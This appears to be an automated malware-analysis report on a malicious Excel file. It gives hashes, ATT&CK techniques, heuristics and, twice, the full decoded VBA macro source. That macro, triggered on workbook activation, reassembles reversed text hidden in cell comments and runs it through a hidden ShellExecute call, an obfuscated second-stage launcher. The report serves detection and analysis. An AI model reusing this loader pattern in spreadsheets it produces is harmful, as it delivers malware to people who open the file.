Office (OLE) malware analysis — malicious · c5d7a09e30824ce1

MALICIOUS

Office (OLE)

85.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2021-07-10

MD5: f03d744095a8ce7a800c51c36501c4ac SHA-1: 6201731124b364b6ebd5e0141e227c8837740222 SHA-256: c5d7a09e30824ce1ff206b2b9e1294e3c15e08bcc437a90f4213ea556dcf0a82

100 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an Excel file containing VBA macros. The macros utilize `CreateObject` to instantiate an object and then call `ShellExecute` with a constructed command. This indicates an attempt to download and execute a second-stage payload, likely from a remote source, which is a common technique for malware delivery. The specific URL or command is obfuscated within the VBA code.

Heuristics 3

Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set cRlofpE = CreateObject(t7)
cRlofpE.ShellExecute "P" + n1, A2, "", "", 0
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1532 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1532 bytes
SHA-256: `135b801221c396b9fe20211b041cd1d34dfd3e51f9e077f0542a396cf65dd310`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Activate() Dim mNxn, gzTrM, AaJREXm, yDKF Set yDKF = Worksheets("Sheet1") mNxn = yDKF.Range("D500").NoteText + yDKF.Range("D501").NoteText + yDKF.Range("D502").NoteText + yDKF.Range("D503").NoteText + yDKF.Range("D504").NoteText + yDKF.Range("D505").NoteText + yDKF.Range("D506").NoteText + yDKF.Range("D507").NoteText t8hg0 = yDKF.Range("D508").NoteText y70fdsd = yDKF.Range("D509").NoteText AaJREX = LOL.lmgha(DUDgvCs(mNxn), t8hg0, y70fdsd) End Sub Function DUDgvCs(Text) Dim i As Integer Dim StrNew As String Dim strOld As String strOld = Trim(Text) For i = 1 To Len(strOld) StrNew = Mid(strOld, i, 1) & StrNew Next i DUDgvCs = StrNew End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "LOL" Function lmgha(A2, n1, t7) Dim cRlofpE Set cRlofpE = CreateObject(t7) cRlofpE.ShellExecute "P" + n1, A2, "", "", 0 End Function

SHA-256: 135b801221c396b9fe20211b041cd1d34dfd3e51f9e077f0542a396cf65dd310

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
Dim mNxn, gzTrM, AaJREXm, yDKF

Set yDKF = Worksheets("Sheet1")

  mNxn = yDKF.Range("D500").NoteText + yDKF.Range("D501").NoteText + yDKF.Range("D502").NoteText + yDKF.Range("D503").NoteText + yDKF.Range("D504").NoteText + yDKF.Range("D505").NoteText + yDKF.Range("D506").NoteText + yDKF.Range("D507").NoteText
 
 t8hg0 = yDKF.Range("D508").NoteText
 y70fdsd = yDKF.Range("D509").NoteText

  AaJREX = LOL.lmgha(DUDgvCs(mNxn), t8hg0, y70fdsd)


End Sub
  


Function DUDgvCs(Text)
    Dim i As Integer
    Dim StrNew As String
    Dim strOld As String
    strOld = Trim(Text)
    For i = 1 To Len(strOld)
      StrNew = Mid(strOld, i, 1) & StrNew
    Next i
    DUDgvCs = StrNew
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "LOL"

Function lmgha(A2, n1, t7)
Dim cRlofpE

Set cRlofpE = CreateObject(t7)
cRlofpE.ShellExecute "P" + n1, A2, "", "", 0



End Function

Open this report in the interactive analyzer, or submit your own file for analysis.